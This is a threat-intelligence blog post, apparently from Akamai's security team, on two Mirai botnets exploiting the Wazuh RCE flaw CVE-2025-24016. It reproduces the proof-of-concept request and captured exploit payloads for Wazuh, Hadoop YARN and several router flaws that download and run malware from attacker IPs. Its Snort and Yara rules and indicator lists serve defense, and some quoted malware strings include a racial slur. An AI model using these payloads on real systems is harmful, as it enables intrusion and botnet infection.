Two Botnets, One Flaw: Mirai Spreads Through Wazuh Vulnerability
CONTENT WARNING: Some of the naming conventions used by the attackers referenced in this article include racial slurs and explicit language. We have not redacted them for educational and discovery purposes. These do not in any way reflect Akamai’s values or viewpoints.
Executive summary
The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of the critical remote code execution (RCE) vulnerability CVE-2025-24016 against Wazuh servers (CVSS 9.9).
The vulnerability takes advantage of decentralized API (DAPI) requests, allowing an attacker to remotely execute code by uploading an unsanitized dictionary.
We observed two campaigns of Mirai variants exploiting this vulnerability. One of these, “Resbot,” has Italian nomenclature involved in its domains, possibly alluding to the targeted geography or language spoken by the affected device owner.
The Akamai SIRT first identified activity in our global network of honeypots in March 2025. This is the first reported active exploitation of this vulnerability since the initial disclosure in February 2025.
The botnets exploiting this vulnerability have leveraged several known vulnerabilities, including CVE-2023-1389, CVE-2017-17215, CVE-2017-18368, and others.
We have included a list of indicators of compromise (IOCs) at the end of this blog post to assist in defense against this threat.
Introduction
The Akamai SIRT discovered active exploitation of the remotely executable Wazuh unsafe deserialization vulnerability CVE-2025-24016 in late March 2025, just a few weeks after the vulnerability’s initial disclosure.
Although the vulnerability has been public for months now, it has not yet been added to CISA’s Known Exploited Vulnerability (KEV) catalog, nor has active exploitation been previously reported. The Akamai SIRT identified two different botnets leveraging this exploit to spread variants of the Mirai malware to vulnerable target systems.
What is CVE-2025-24016?
In February 2025, CVE-2025-24016 was disclosed in the manager package of the open source XDR and SIEM solution Wazuh. It affects Wazuh versions 4.4.0 through 4.9.0, with a fix released in version 4.9.1. The vulnerability enables a remote attacker with API access to execute arbitrary code on the target server with a maliciously crafted JSON file.
In the Wazuh API, parameters in the DistributedAPI are serialized as JSON, then deserialized using as_Wazuh_object in the framework/wazuh/core/cluster/common.py file. This can be exploited by injecting an unsanitized dictionary into DAPI requests, which can lead to evaluation of arbitrary Python code.
In late February 2025, a proof of concept (PoC) detailed how to achieve RCE with this vulnerability. RCE can be triggered using the run_as endpoint, enabling the attacker to control the auth_context argument. In the PoC, the author demonstrates this using a Burp Suite request against the URI /security/user/authenticate/run_as (Figure 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Fig. 1: Burp Suite request (Source: https://github.com/MuhammadWaseem29/CVE-2025-24016)
The authorization header is Base64-encoded, and the malicious payload contains the unsanitized exception __unhandled_exc__, which triggers the execution of arbitrary Python code — in this case, exit.
Active exploitation
Just a few weeks after disclosure, in early March 2025, the Akamai SIRT discovered attempts to exploit this Wazuh vulnerability in our global network of honeypots. This is the latest example of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs.
The Base64-encoded header authorization decodes to wazuh-wui:MyS3cr37P450r.*-, which is identical to the authorization in the PoC exploit (Figure 2). The endpoint and request structure match the PoC exploit, but here it's used to spread malware.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 2: Exploit attempt #1 is identical to the PoC
Additionally, we detected similarly structured requests targeting the endpoint /Wazuh in early May 2025, which is different from the standard target endpoint for this vulnerability (Figure 3). As the requests are almost identical to the PoC, aside from the endpoint, it is likely that the botnet is still attempting to exploit the same Wazuh vulnerability.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 3: Exploit attempt #2 is different from the PoC
Botnet 1: Multiple Mirai variants
Our observed active exploitation of this Wazuh vulnerability is connected to two separate botnets. The first botnet is connected to the first attempts in early March 2025, in which the exploit fetches and executes a malicious shell script that serves as a downloader for the main Mirai malware payload (Figure 4). Similar to the average shell scripts we often see with Mirai, it supports a variety of different architectures to target primarily Internet of Things (IoT) devices.
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Fig. 4: Contents of the w.sh shell script
These Mirai malware samples, named “morte,” appear to be LZRD Mirai variants, which have been around for some time. They can be easily distinguished by the hard-coded unique string they print on a target machine’s console upon execution: “lzrd here”.
Associated domains observed
Looking into the IP address 176.65.134[.]62 turned up a resolution to a command and control (C2) domain of nuklearcnc.duckdns[.]org. It is important to note that Duck DNS is a dynamic DNS server, and only this particular subdomain is malicious here.
This domain also resolved to 176.65.142.252 around a similar time frame. That IP resolved to another C2 domain called cbot.galaxias[.]cc. Through VirusTotal, we were able to find what appears to be a Windows-based RAT that disguises itself as the Windows svchost process, and beacons back to the cbot.galaxias[.]cc subdomain for C2.
Another subdomain, neon.galaxias[.]cc, had what appeared to be more standard Mirai variant distribution and communication associated with it. One of its resolving IP addresses, 209.141.34[.]106, also resolved to two other C2 domains: pangacnc[.]com, and jimmyudp-raw[.]xyz.
The jimmyudp-raw[.]xyz domain had three different named Mirai malware samples on VirusTotal. The first, called “neon”, is an unidentified Mirai variant that connected to 65.222.202[.]53 over port 80 for C2 communication, and contained the hard-coded console string “fuck u nigga”.
The second, called “k03ldc”, appears to be a modified or upgraded version of the V3G4 Mirai variant. Containing the hard-coded console string of “666V3G4-Katana999”, it connected to 196.251.86[.]49 over port 36063 for C2 communication.
Finally, the third sample, called “KKveTTgaAAsecNNaaaa”, is the original V3G4 Mirai variant. The malware connects to 209.141.34[.]106 over port 60195 for C2 communication, and uses the hard-coded string “xXxSlicexXxxVEGA” upon infection. It recognizes whether a target machine is already infected by the V3G4 variant and, if so, will print “We got this shit already” rather than the typical print.
The pangacnc[.]com domain had two different named Mirai malware samples on VirusTotal, one was the “KKveTTgaAAsecNNaaaa” named malware, which is identical to the one mentioned previously. The other was named “vision”, and is a LZRD Mirai variant that connects to 65.222.202[.]53 over port 80, just like the “neon” sample from the other C2 domain. This alludes to a possibility that the “neon” named Mirai malware is a modified version of the LZRD variant.
Additional vulnerabilities exploited
Aside from targeting the Wazuh RCE, we observed this botnet attempting to exploit a variety of other known vulnerabilities. This included several vulnerabilities that we’ve observed being exploited (Figure 5, Figure 6, and Figure 7) and have documented in previous blog posts.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Fig. 5: Hadoop YARN vulnerability
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Fig. 6: TP-Link Archer AX21 command injection (See https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Fig. 7: ZTE ZXV10 H108L router RCE exploit (See https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: Resbot/Resentual botnet
The second botnet we identified was from the attempts on the /Wazuh endpoint in early May 2025. Similar to the first exploit, it too fetches and executes a malicious shell script to serve as a Mirai downloader. The malware, named “resgod,” is identified through its hard-coded console string “Resentual got you!” Also similar to the first botnet, the payload targets a wide variety of architectures targeting IoT devices.
One of the interesting things that we noticed about this botnet was the associated language. It was using a variety of domains to spread the malware that all had Italian nomenclature. Domains such as “gestisciweb.com,” for example, roughly translate to “manage web.”
They look similar to malicious domain names that are often used for phishing attacks because they look much more legitimate than their C2 “resbot.online” (which is more clearly a malicious domain). The linguistic naming conventions could indicate a campaign to target devices owned and run by Italian-speaking users in particular.
The strings in the sample appear to be unencrypted and show a variety of additional scanning capabilities and exploits. The 104.168.101[.]27 IP address is hard-coded in the malware and is used as the C2 server over TCP port 62627 (one of the possible C2 ports). Additionally, we have found this botnet attempting to spread via FTP over port 21 and conducting telnet scanning.
The different hard-coded exploits can be seen in Figure 8, Figure 9, Figure 10, and Figure11.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Fig. 8: Huawei HG532 router RCE (See https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Fig. 9: Realtek SDK Miniigd UPnP SOAP RCE (See https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Fig. 10: TrueOnline ZyXEL P660HN-T v1 router command injection (See https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Fig. 11: Spreading via FTP
Conclusion
The propagation of Mirai continues relatively unabated, as it remains rather straightforward to repurpose and reuse old source code to set up or create new botnets. And botnet operators can often find success with simply leveraging newly published exploits.
Although the CVE program is overall a net benefit to the industry, it can sometimes be a double-edged sword by shining light on vulnerabilities that might have otherwise been overlooked by nefarious actors.
Researchers’ attempts to educate organizations on the importance of vulnerabilities by creating PoCs continue to lead to baleful results, showing just how dire it is to keep up with patches when they are released. Botnet operators keep tabs on some of these vulnerability disclosures — and, especially in cases where PoCs are made available, they will quickly adapt the PoC code to proliferate their botnet.
Unlike some of the other vulnerabilities we have reported on recently that often only affect retired devices, CVE-2025-24016 affects active Wazuh servers running outdated versions. It is highly recommended to patch to the latest version that contains a fix — in this case, Wazuh version 4.9.1 or later.
Keep up with us
The Akamai SIRT will continue to monitor and report on threats like this for both our customers and the security community at large. To keep up with the SIRT and other publications from the Akamai Security Intelligence Group, check out our research home page and follow us on social media.
IOCs
We’ve included a list of IOCs, as well as Snort and Yara rules, to aid defenders.
Snort rules for network IOCs
Snort rules for C2 IPs (botnet #1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort rules for C2 domain resolution detection (botnet #1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort rules for C2 IPs (botnet #2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort rules for C2 domain resolution detection (botnet #2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Yara rules for malware samples (botnet #1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Yara rules for malware samples (botnet #2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Malicious IPv4 addresses (botnet #1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Malicious domains (botnet #1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Malicious IPv4 addresses (botnet #2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Malicious domains (botnet #2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
SHA256 hashes (botnet #1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
SHA256 hashes (botnet #2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
